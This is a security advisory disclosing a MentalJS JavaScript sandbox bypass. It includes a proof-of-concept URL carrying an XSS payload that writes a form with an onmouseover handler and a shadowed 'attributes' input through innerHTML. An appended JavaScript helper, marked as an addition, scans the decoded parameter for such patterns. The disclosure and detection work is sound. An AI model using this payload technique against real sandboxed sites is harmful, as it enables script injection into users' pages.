# Title: Mental JS Sandbox Bypass
# Product: Mental JS
# Author: Rafay Baloch and Giuseppe Trotta (@guitro)
# Company: RHAINFOSEC
# Website: http://services.rafayhackingarticles.net

===========
Description
===========

MentalJS is a JavaScript sandbox created by Gareth Heyes. The sandbox is
inserted at the beginning of the HTML response, thereby preventing an
attacker from accessing DOM elements.

=============
Vulnerability
=============

It was still possible to access DOM elements with MentalJS enabled by
executing JavaScript through the innerHTML property
(document.body.innerHTML in the proof of concept below).


================
Proof of concept
================

The POC is as follows:

http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E
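
Added example (not part of the original advisory, and not MentalJS code): a JavaScript triage helper that decodes the PoC's test parameter and reports the markup features it carries, namely an inline event handler and a form control whose name shadows the form's built-in attributes property. The function names and the short SHADOWABLE list are assumptions made for illustration.

```javascript
// Added example: heuristic triage of a reflected parameter for log review.
// It is a regex scan, not a sanitizer, and it is not MentalJS code.

// PoC URL exactly as given in the advisory.
const POC_URL = 'http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E';

// Constructed, non-exhaustive list of DOM property names. A form control
// carrying one of these as name/id shadows that property on its <form>.
const SHADOWABLE = new Set(['attributes', 'childNodes', 'innerHTML',
  'nodeName', 'parentNode', 'tagName', 'action', 'elements', 'submit']);

// Attribute with a double-quoted, single-quoted or unquoted value.
const ATTR = /([a-z][\w-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

function decodeParam(url, name) {
  // URLSearchParams applies form decoding: '+' becomes a space, %XX is decoded.
  return new URL(url).searchParams.get(name);
}

function scanMarkup(text) {
  const findings = [];
  // Walk every opening tag and inspect its attributes.
  for (const tag of text.matchAll(/<([a-z][a-z0-9]*)\b([^>]*)>/gi)) {
    const tagName = tag[1].toLowerCase();
    for (const a of tag[2].matchAll(ATTR)) {
      const attr = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4];
      if (attr.startsWith('on')) {
        // Inline handler: script that runs outside any rewritten <script> body.
        findings.push({ kind: 'event-handler', tag: tagName, attr, value });
      } else if ((attr === 'name' || attr === 'id') && SHADOWABLE.has(value)) {
        // Named control that hides a built-in property of the parent form.
        findings.push({ kind: 'shadowed-property', tag: tagName, attr, value });
      }
    }
  }
  // Markup written through innerHTML is parsed by the browser at runtime.
  return { usesInnerHTML: /\.innerHTML\s*=/.test(text), findings };
}

console.log(scanMarkup(decodeParam(POC_URL, 'test')));
```
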